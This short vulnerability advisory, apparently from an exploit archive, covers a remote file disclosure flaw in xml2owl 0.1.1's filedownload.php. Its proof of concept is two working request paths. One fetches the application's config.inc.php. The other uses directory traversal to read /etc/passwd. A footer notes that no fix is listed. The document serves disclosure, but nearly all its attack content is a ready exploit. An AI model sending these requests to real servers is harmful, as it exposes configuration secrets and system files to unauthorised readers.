xml2owl 0.1.1 (filedownload.php) Remote File Disclosure Vulnerability

2007-12-13 00:00:00

xml2owl 0.1.1 (filedownload.php) Remote File Disclosure Vulnerability
D.s : http://surfnet.dl.sourceforge.net/sourceforge/xml2owl/xml2owl-0.1.1.tar.bz2
POC :
/xml2owl-0.1.1/filedownload.php?file=config.inc.php
/xml2owl-0.1.1/filedownload.php?file=../../../../../../../etc/passwd

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.